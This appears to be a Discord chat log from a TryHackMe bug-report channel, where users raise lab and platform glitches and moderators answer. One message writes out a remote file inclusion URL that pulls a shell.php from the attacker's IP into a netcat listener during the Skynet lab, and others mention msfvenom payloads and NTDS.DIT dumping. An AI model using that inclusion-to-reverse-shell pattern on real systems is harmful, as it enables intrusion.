it is saying 404 it is gone into a matrix
@edgy raptor Which game is this?

@N3ko Please let me know when you finished to update the room in order to not forget finish it ^^

will do

@rare swallow https://tryhackme.com/p/Chevalier (added)
@frosty cape thanks dude

Can someone tell me why SSH is so slow

No a bug, wrong chat

Which chat?

Depends. Probably #general

When a machine expires, I have to reload the page for the deploy button to work (it stays greyed out otherwise).

yes, known issue

my streak went from 2 to 1 ? i've been active these last 3 days...

@covert kernel They're being fixed

🆗

This is kind of unclear?

!*

you're a ninja harry

did you sit on my cake

Pictures do not correctly center on an actual room page however they are centered in the room manager

hey theres a bug in Offline Machine

there were only 8 flags in it

and i dont know how i submitted 9 flags

come and witness it https://tryhackme.com/games/koth/3067

HELLO. CAN ANYONE HELP ME

sorry for caps

i found the bug 😦

@covert kernel And what bug have you found?

machine vulnversity

if i tried to type answer format .phtml whitch is correct

i have a Uh-oh! Undefined

Could this be because the site is "down"?

no is ok i got 1h23min

terminate and deploy may help??

no i mean, tryhackme.com is down rn

but i'm not 100% sure if that could be the problem

@tender nimbus The website is back up

Really?

not for me

i have access to site but i cant sucess this thread

just one buggy thread

ok after terminate and new deploy work's fine 🙂 thank you for the answer 🙂

it seems that Anthem closes itself down after 1h, not sure the reason why but it has been reported multiple times. @frosty cape is this something that you might know about ?

Hmm, windows

@rare swallow Hackpark does it too

So it seems to be a windows thing

fascinating

it has been reported that even when the user is RDP-ing they see the shutdown screen

I'd hazard a guess it's the api not connecting to the AWS windows service

but that's like

a wild guess

does the windows box have the same issue?

Skidy's confirmed the requests to extend go through

api -> aws -> service

ohhhh

like the other vm for hacking?

Room Network Services, Task 7 , when i Ping my host i not see it in tcpdump ?

ping tun0 ip

not your public ip address

@worldly pagoda it does work, not a bug

yes i ping tun0 but not receive it

it works fine. your command might be wrong

hmm

Probably your listener. Make sure you're running the VPN on your attacker, not on the host if you're using a VM

#room-help

i also try on THM Kali but not received

It works.

If it doesn't work for you, that's on you

I'm going to deploy HackPark, and wait an hour

Then see if its accessable:)

It wasn't for me

Shiba boxes at learn linux keep crashing when I enter commands

Sounds like a VPN problem @twilit flame

hi , machine SKYNET.. while i listen on nc -lvp , i try the http://target/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://ip_adress/shell.php

but not expolited

....

@wanton bramble Head over to #room-help and watch this: https://www.youtube.com/watch?v=53zkBvL4ZB4

@wanton bramble Not a bug.

absolutely not a bug 🙂

but i am not sure editing this shell

how do i edit this shell, can you help me?

If you want help go over to #room-help

Kenobi nmap scan returns the wrong number of ports:

`Nmap scan report for 10.10.223.245
Host is up (0.18s latency).
Not shown: 65322 closed ports, 202 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2049/tcp open nfs
33581/tcp open unknown
35515/tcp open unknown
40063/tcp open unknown
52573/tcp open unknown

Answer is 7. Listed is 11.

Known issue @vital glen

hıı okey thank you @median sapphire this section is about bugs

@wanton bramble Exactly and this is not a bug, this is a user error, if you want help head over to #room-help no one will help you here.

yes so sorry 🙂 @median sapphire

Can anyone tell me it the .ovpn configs permit or pass-through non 10.10.0.0 traffic (i.e., THM.com rooms)? It's getting kind of annoying switching the VPN on and off to access the web and research rabbitholes.

The VPN should only be routing THM traffic into the network

@shadow sand The VPN uses split tunnelling. It only routes traffic on 10.x.x.x

if you're using virtualbox, the default NAT settings might be interfering as IIRC the gateway is put on that subnet

That's what I figured. I'm running on bare-metal with no virtualization. Just thought I'd confirm what I suspected. Thanks.

@shadow sand If you lose internet with the VPN active, that's on your end. Essentially.

it looks like the writeups submission might be bugged? when hitting the submit button I get this dialog box with and nothing in notifications.

@frosty cape ^

Writeup submission still works, I verified that on my end.

@fair moon Anything in console?

No

Ok so this needs to be fixed. If you make a room that's sub only (intro to python) You can't view it if your sub expires 😂

I fixed the writeup bug there. I found it a few days ago, will be live in the next few days.

Ok so this needs to be fixed. If you make a room that's sub only (intro to python) You can't view it if your sub expires 😂
@worthy stag Ahh okay thats true, I'll fix this too aha

Just had a stark reminder that my uni sub ran out yesterday 😂

RIP

Has it been 4-5 months already - wow

Yeah big F

Can't wait to resit the year to get another 4 months 😄

Aha! Do they not use it in your 2nd year?

@frosty cape they use it for Ethical Hacking which is a second year module

Yeah I'm resitting second year

decided that due to the virus I'd gain more value redoing the year

rather push for a 1st 2:1

Not sure if you're srs or not

Well, it beats not being in Uni at all - my last year has ended so poorly.

Yeah full seriousness

Had a call with Nick a week or so ago about a bunch of stuff and then sending off my application to suspend study tomorrow

Ah, thats interesting I thought the final year carried so much weight you can make it up (I know people who have bombed 2nd year & are on track to get a first as final year carries more weight)

Yeah idk it just feels weird going into final year with only 3 decent graded modules

@near mason What did you get 2nd year? && You're on track for a 1st now right?

@frosty cape @worthy stag you say u have three good grades, which is better than my two in second year lol. I barely showed up to uni that year, yet I'm on track for a first overall this summer

Yeah, not sure the details obvs, but if you can help not re-doing a year?

Otherwise, at least you have TryHackMe to look forward to:D

plus the 40% weight second year really doesn't effect the 60% of 3rd year, especially when 40 credits of 3rd year is for your own project

Yeah I know, it's more a personal thing as I wanna get as good as I can get

plus I want an actual change to redo the forensics module (Gareths) as it's honeypots

and beautiful

It also allows you to see if the course improved

Yeah fair enough:)

https://tenor.com/view/toddlers-and-tiaras-reality-smile-creepy-evil-gif-3405515

Sorry if this has been said a million times, but is anyone elses hacking streak kind of broken? get going +/- a day and then reset after hitting a week streak

@long osprey it's being fixed

Gotcha okay. Wasn't going to say anything at first but thought about it again and figured I'd ask. Thanks for the reply

@rugged ermine PS Empire doesn't work

I did that lab a couple weeks ago, but it completely nuked my Impacket and I had to revert to a snapshot.

might be a bug or not, tbh i'm not sure. I'm on "Common PrivEsc" room currently talking about Task 8: Exploiting Crontab. The questions lead you through creating a payload with msfvenom but it looks as if it isn't installed on the machine. All questions are set as no input needed so I assume it was a conscious decision but would be nice to have a note saying this? unless it is a mistake that it's missing and should be on there after all lol

@peak egret Not a bug, run msfvenom on your host machine.

AH! wasn't aware. thank you 🙂 disregard my non-bug

in the active directory room, in task 7 question 1, I put the right asnwers but it says is wrong.Then I put every possible answer and it still says it is wrong

this is the question: What method allowed us to dump NTDS.DIT?

My streak just randomly reset (as stated in #522158404614225920) i did some rooms yesterday and the day before but now im on 0 (no big deal was only at 2/3 but still...)

After an hour anthem shut down on it's own, I still have 58 minutes remaining.

Raised it @median sapphire

@rare swallow Ah, alright 🙂

Been raised a few times

I also can't rdp back in 🤔

Please do not post answers @flint dragon

ok

You can post what you think to be is a bug, just don't post answers / spoilers, thanks.

I think there is a bug on the Hacking with Powershell at task 3 question 3. I input the correct answer and it tells me that is not the correct answer. I've done the steps mentioned and the other questions are correctly inputed

is it ok now @topaz venture

?

@flint dragon Not a bug

You are not filtering the cmdlets from functions and aliases

Thank you @median sapphire

Do you guys know that when you deploy kali machine it says it has 8gb ram but it has 4 actualy ?

Hello #685858111952781324 #site-bugs I think there is a regression due to the last deployment in the public profile yearly activity. The last case was on 2nd, May
@frosty cape I don't think there is a bug here?

There are 3 actions it counts. Deploy-vm/Answer-question/deploy-downloadable

Looking at your profile, its calculating your events correctly.

@frosty cape there is however, a render bug with activity

Where it'll sometimes skip rendering squares on the chart, but the data was returned by the API

Oh oka. I understand what you mean now.

Looking into that now

@frosty cape https://discordapp.com/channels/521382216299839518/685858111952781324/707297833073770527

there is way get a nice shortcut on step 1 of peakhill, i guess it's not intended

@frosty cape it has been fixed some days later

Or it was a temporary bug ^^ but it's displayed well for one week

cc @austere wedge :)

can we DM about this issue?

It might be the same one Szymex found

@sullen vessel Feel free to DM me

i think i shortcuted both steps in fact

@short jackal Found a shortcut that I'm patching now

(everything was handled in DM)

both steps? 🤔

@potent orchid read the secretsdump output

Thanks for the quick tips guys!

@short jackal: the end of the first part, and the full second part*

I patched those two things that were reported (hopefully they are good now??) so please do let me know if you clever h@x0rs find any other unintentionals

Hello in the Introductory Networking room Task 6 Question 2 the IP address i receive and IP address room wants are different.(First time writing, sorry if my writing format is wrong)

@ornate ivy What does the question ask?

Ping tryhackme.com
What is the IP address?

Ah yep

That's being fixed

oky thnx for your time

@ornate ivy That should already be fixed

What domain is it telling you to ping?

Ooooh this could be the first victim of cloudflare caching

or they could just need to refresh

The question was changed to ping blog.tryhackme.com

Which isn't behind cloudflare

I've just confirmed, it has been updated

Oh

But the cloudflare caching....

Could be caching the question

yeah

Although it shouldn't cache the API calls?

@ornate ivy Could you screenshot the question?

The blog IP address is completely different to the site address though

So either way the answer would be wrong

sure

ah yes it changed to blog.tryhackme.com

thnx

Np 🙂

i either found a bug in Corp room or i dont have enough knowleage to solve it who should i ask about that?